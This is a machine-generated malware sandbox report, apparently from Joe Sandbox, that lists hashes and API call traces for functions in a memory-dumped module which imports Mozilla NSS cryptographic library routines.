Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: b164e9039d51046af44a34005fd81d0ba068d4446d0c8681007983ea36225dd0
Instruction ID: 0b86f1911fc05ee45857779564577a3188ef3f18ab7e47cb4662ec0053a33594
Opcode Fuzzy Hash: b164e9039d51046af44a34005fd81d0ba068d4446d0c8681007983ea36225dd0
Instruction Fuzzy Hash: 71112675E002146BE7209A659D41BBF73B9EF9525DF044228EC1996B41FB20E99C82F2

Function 6CA98E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CAB2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA84F1C), ref: 6CA98EA2

Part of subcall function 6CABF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CABF854
Part of subcall function 6CABF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CABF868
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CABF882
Part of subcall function 6CABF820: free.MOZGLUE(04C483FF,?,?), ref: 6CABF889
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CABF8A4
Part of subcall function 6CABF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CABF8AB
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CABF8C9
Part of subcall function 6CABF820: free.MOZGLUE(280F10EC,?,?), ref: 6CABF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CAB2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA84F1C), ref: 6CA98EC3
TlsGetValue.KERNEL32(?,?,?,6CAB2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA84F1C), ref: 6CA98EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CAB2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA98EF1
PR_Unlock.NSS3 ref: 6CA98F20

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: bdcf4e232bb822c3e7731f6f109ef83bb41556b8836db3d2b2a2fcb45476b6cc
Instruction ID: 696d9a1dce22cc8e1e76eb6d57b8c2eb62ec895f6f30d94b90a4341276a4dd68
Opcode Fuzzy Hash: bdcf4e232bb822c3e7731f6f109ef83bb41556b8836db3d2b2a2fcb45476b6cc
Instruction Fuzzy Hash: AC218B74A096059FCB00AF39D588299BBF4FF48318F05856EEC989BB41D730E894CBC2

Function 6CAC8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8821
TlsGetValue.KERNEL32(?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC883D
EnterCriticalSection.KERNEL32(?,?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAC8887
PR_Unlock.NSS3(?,?,?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8899

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 4a098bf3d16a47fb2052047df74feb875e7299b1e17707503fa2b1696ef02bcf
Instruction ID: 59ff9ade59850415c857c90f6c44f4e5c90bb9b95cc1af6990d017b466ee59c1
Opcode Fuzzy Hash: 4a098bf3d16a47fb2052047df74feb875e7299b1e17707503fa2b1696ef02bcf
Instruction Fuzzy Hash: 60214CB4A04605CFDB00AF78C5881AABBF4FF05358F14466ADC9497A45E730D9D5CB92

Function 6CA928A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CA880DD), ref: 6CA928BA
EnterCriticalSection.KERNEL32(?,?,?,?,6CA880DD), ref: 6CA928D3
PR_Unlock.NSS3(?,?,?,?,?,6CA880DD), ref: 6CA928E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6CA880DD), ref: 6CA9290E
free.MOZGLUE(?,?,?,?,?,?,6CA880DD), ref: 6CA9291A

Part of subcall function 6CA89270: DeleteCriticalSection.KERNEL32(?,?,6CA95089,?,6CA93B70,?,?,?,?,?,6CA95089,6CA8F39B,00000000), ref: 6CA8927F
Part of subcall function 6CA89270: free.MOZGLUE(?,?,6CA93B70,?,?,?,?,?,6CA95089,6CA8F39B,00000000), ref: 6CA89286
Part of subcall function 6CA89270: PL_HashTableDestroy.NSS3(?,6CA93B70,?,?,?,?,?,6CA95089,6CA8F39B,00000000), ref: 6CA89292

Part of subcall function 6CA88B50: TlsGetValue.KERNEL32(00000000,?,6CA90948,00000000), ref: 6CA88B6B
Part of subcall function 6CA88B50: EnterCriticalSection.KERNEL32(?,?,?,6CA90948,00000000), ref: 6CA88B80
Part of subcall function 6CA88B50: PL_FinishArenaPool.NSS3(?,?,?,?,6CA90948,00000000), ref: 6CA88B8F
Part of subcall function 6CA88B50: PR_Unlock.NSS3(?,?,?,?,6CA90948,00000000), ref: 6CA88BA1
Part of subcall function 6CA88B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6CA90948,00000000), ref: 6CA88BAC
Part of subcall function 6CA88B50: free.MOZGLUE(?,?,?,?,?,6CA90948,00000000), ref: 6CA88BB8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: e68a613a75ae08e7f70051fe17c32f0d2f0199263a4a4556fed4cd26677a2c85
Instruction ID: 679cd110756bc4770b0aca98f4412b01e323717689f4db13a785c4f2cfba1ba7
Opcode Fuzzy Hash: e68a613a75ae08e7f70051fe17c32f0d2f0199263a4a4556fed4cd26677a2c85
Instruction Fuzzy Hash: 46213CB5A05A059BCB00BFB8C189469BBF0FF09354F054A69DC9597B00EB30E8D9CB92

Function 6CA88FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CA90710), ref: 6CA88FF1
PR_CallOnce.NSS3(6CBD2158,6CA89150,00000000,?,?,?,6CA89138,?,6CA90710), ref: 6CA89029
calloc.MOZGLUE(00000001,00000000,?,?,6CA90710), ref: 6CA8904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CA90710), ref: 6CA89066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CA90710), ref: 6CA89078

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: c48b5929b2566a793723801a2ea71e38fc5f8cfd6d34612591de5f663449221c
Instruction ID: 101a5c7b4db3ece507787973fbf9e66e87c77d794166f840f31396714c101ee5
Opcode Fuzzy Hash: c48b5929b2566a793723801a2ea71e38fc5f8cfd6d34612591de5f663449221c
Instruction Fuzzy Hash: C011E13570215167EB201AB9AD04A6A32BCEB827ADF580131FC98D6F40F752CD9583A2

Function 6CA9CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CAB1E10: TlsGetValue.KERNEL32 ref: 6CAB1E36
Part of subcall function 6CAB1E10: EnterCriticalSection.KERNEL32(?,?,?,6CA8B1EE,2404110F,?,?), ref: 6CAB1E4B
Part of subcall function 6CAB1E10: PR_Unlock.NSS3 ref: 6CAB1E76

free.MOZGLUE(?,6CA9D079,00000000,00000001), ref: 6CA9CDA5
PK11_FreeSymKey.NSS3(?,6CA9D079,00000000,00000001), ref: 6CA9CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CA9D079,00000000,00000001), ref: 6CA9CDCF
DeleteCriticalSection.KERNEL32(?,6CA9D079,00000000,00000001), ref: 6CA9CDE2
free.MOZGLUE(?), ref: 6CA9CDE9

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 3edf5ab97c324d12309f22659b6493dde27c7acc654659fb781a665e35eebc6e
Instruction ID: 99dd423b3b762181d30041b65f54566e06c78bb443e65ba672353645d165bc5f
Opcode Fuzzy Hash: 3edf5ab97c324d12309f22659b6493dde27c7acc654659fb781a665e35eebc6e
Instruction Fuzzy Hash: F811A3B2B01515ABDB00AEA5EC46A96B7BCBB0425C7180121F91997E11E732E5A4C7E1

Function 6CAD3D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CAD38A2), ref: 6CAD3DB0
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CAD38A2), ref: 6CAD3DBF

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CAD38A2), ref: 6CAD3DD9
_wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6CAD38A2), ref: 6CAD3DE7
free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6CAD38A2), ref: 6CAD3DF8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
String ID:
API String ID: 1642359729-0
Opcode ID: ddf8156f9d0f764b31c489e49fe83690fcf3a950b09f91d7f14d3def2aa862a4
Instruction ID: 57b89683947b1b97c419b650d31c05dcc98771fdb5cb0951c98532686e886fe0
Opcode Fuzzy Hash: ddf8156f9d0f764b31c489e49fe83690fcf3a950b09f91d7f14d3def2aa862a4
Instruction Fuzzy Hash: B701D6B57061223BFB1056765C49E3B39BCDB426A8B190635FD29DB6C0EA51ED1081F1

Function 6CB02CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CB05B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB05B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB02CEC

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PR_EnterMonitor.NSS3(?), ref: 6CB02D02
PR_EnterMonitor.NSS3(?), ref: 6CB02D1F
PR_ExitMonitor.NSS3(?), ref: 6CB02D42
PR_ExitMonitor.NSS3(?), ref: 6CB02D5B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: eeba1066ad98faa38b3c9af89ce33027bf3fa90885c382b702c1c92125466295
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: F701A1B1A002906FEB309E25FC44B8BBBA5EB45318F004625E85D86B20E632F819C693

Function 6CB02D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CB05B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB05B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB02D9C

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PR_EnterMonitor.NSS3(?), ref: 6CB02DB2
PR_EnterMonitor.NSS3(?), ref: 6CB02DCF
PR_ExitMonitor.NSS3(?), ref: 6CB02DF2
PR_ExitMonitor.NSS3(?), ref: 6CB02E0B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: a81e4839797d2405fffcb7026cfda30b716ec50efd53513532c58a12aae7f9f7
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 1001C4B5B402909BEB309E25FC05BCBBBA5EF41318F000535E85D87B20D632F829C693

Function 6CA9AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CA83090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA9AE42), ref: 6CA830AA
Part of subcall function 6CA83090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA830C7
Part of subcall function 6CA83090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CA830E5
Part of subcall function 6CA83090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA83116
Part of subcall function 6CA83090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA8312B
Part of subcall function 6CA83090: PK11_DestroyObject.NSS3(?,?), ref: 6CA83154
Part of subcall function 6CA83090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA8317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CA799FF,?,?,?,?,?,?,?,?,?,6CA72D6B,?), ref: 6CA9AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CA799FF,?,?,?,?,?,?,?,?,?,6CA72D6B,?), ref: 6CA9AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA72D6B,?,?,00000000), ref: 6CA9AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CA72D6B,?,?,00000000), ref: 6CA9AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CA72D6B,?,?), ref: 6CA9AEA3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 54a1290a0d5068a0c2ba7f7d1fc8a2bcf851fc92e4b1ad006be763fbbd67a4fa
Instruction ID: fd1dc5943533f1bfddd5adada779ccfc30e8e85bbab8ac01fe414cd3de02d382
Opcode Fuzzy Hash: 54a1290a0d5068a0c2ba7f7d1fc8a2bcf851fc92e4b1ad006be763fbbd67a4fa
Instruction Fuzzy Hash: 1C01A476F2543057E701966CAD87AAB31EA8B8765CF080033E90AD7B01F615DDC942E3

Function 6CB8BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CB87AFE,?,?,?,?,?,?,?,?,6CB8798A), ref: 6CB8BDC3
free.MOZGLUE(?,?,6CB87AFE,?,?,?,?,?,?,?,?,6CB8798A), ref: 6CB8BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB87AFE,?,?,?,?,?,?,?,?,6CB8798A), ref: 6CB8BDE9
free.MOZGLUE(?,00000000,00000000,?,6CB87AFE,?,?,?,?,?,?,?,?,6CB8798A), ref: 6CB8BE21
free.MOZGLUE(00000000,00000000,?,6CB87AFE,?,?,?,?,?,?,?,?,6CB8798A), ref: 6CB8BE32

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: fbcf511b31f217bae7092b3f1906d2507184c4258e68c8f69936d7aaf6fe7c73
Instruction ID: 98defeea29f22c9f32273a22f3b2c0fdd49d0b8db9974c7ee68163ccc44f2fc5
Opcode Fuzzy Hash: fbcf511b31f217bae7092b3f1906d2507184c4258e68c8f69936d7aaf6fe7c73
Instruction Fuzzy Hash: 7011DAB5B012909FEF10DF69D86DB023BB9EB4A254B580065E50A87710E731B914CBA7

Function 6CAD3E10 Relevance: 7.5, APIs: 5, Instructions: 45memoryfileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,00000000,?,6CAD3975), ref: 6CAD3E29
PORT_Alloc_Util.NSS3(00000000,?,00000000,?,6CAD3975), ref: 6CAD3E38

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,6CAD3975), ref: 6CAD3E52
DeleteFileW.KERNEL32(00000000), ref: 6CAD3E5D
free.MOZGLUE(00000000), ref: 6CAD3E64

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_DeleteFileUtilValuefreemalloc
String ID:
API String ID: 3873820591-0
Opcode ID: d095f924914805509e2768f7e335e49ddfbfad0f4cbaad94e33e99032f0f7672
Instruction ID: 1d87cc47b0dadda40fe1fde434a7184f539c50088576ec095389d249b9ad7ebd
Opcode Fuzzy Hash: d095f924914805509e2768f7e335e49ddfbfad0f4cbaad94e33e99032f0f7672
Instruction Fuzzy Hash: 80F0B4B53072023BFB10217A5C09E3735BCCB469B9B180634BE39C69C1ED40DC4142B1

Function 6CB87C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6CB87C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB87C83
malloc.MOZGLUE(00000001), ref: 6CB87C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB87C9F
PR_GetCurrentThread.NSS3 ref: 6CB87CAD

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
